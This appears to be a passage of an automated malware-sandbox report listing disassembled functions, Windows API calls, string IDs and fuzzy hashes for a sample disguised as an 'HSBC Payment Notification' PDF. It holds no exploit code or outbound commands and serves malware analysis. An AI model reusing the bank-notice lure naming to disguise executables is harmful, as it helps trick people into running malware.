                                                                                                                                                    • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                                                                                                                    Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                                                                                                    • __swprintf.LIBCMT ref: 0045A51B
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045A52E
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045A5BF
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                                                                                                    • GetParent.USER32(?), ref: 0045A69C
                                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045A731
                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045A76B
                                                                                                                                                      • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                                    • String ID: %s%u
                                                                                                                                                    • API String ID: 3744389584-679674701
                                                                                                                                                    • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                                                                                    • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                                                                                                                    • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                                                                                    • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                                                                                                                    Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045AF29
                                                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045AF8C
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0045AF9D
                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045AFE5
                                                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0045B065
                                                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                                                    • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                                                                                    • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                                                                                                                    • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                                                                                                    • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                                                                                                                    Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                                                                                      • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                      • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                      • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                                                                                                    • _wcscat.LIBCMT ref: 0048C6EE
                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                                                                                                    • DragFinish.SHELL32(?), ref: 0048C75E
                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                                                                                                                    • API String ID: 169749273-3863044002
                                                                                                                                                    • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                                                                                    • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                                                                                                                    • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                                                                                    • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                                                                                                    Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                                                    • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                                                                                                                    • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                                                                                                    • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                                                                                                                    • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                                                                                                    Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 004750C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2577412497-0
                                                                                                                                                    • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                    • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                                                                                                    • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                    • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                                                                                                    Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0048A259
                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0048A40D
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                                                                                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                                                    • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                    • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                                                                                    • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                    • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                                                                                    Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                                                    • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                                                                                                                    • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                                                                                    • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                                                                                                                    • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                                                                                    Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                                                    • Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                                                                                                                    • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                                                                                                    • Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                                                                                                                    • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                                                                                                    Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                                                                                                    • GetFocus.USER32 ref: 0048C20C
                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                                                                                                    • _memset.LIBCMT ref: 0048C342
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                                                    • Opcode ID: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                                                                                                                                                    • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                                                                                                                    • Opcode Fuzzy Hash: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                                                                                                                                                    • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                                                                                                                    Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0047738F
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00477479
                                                                                                                                                    • DeleteDC.GDI32(00000006), ref: 00477480
                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
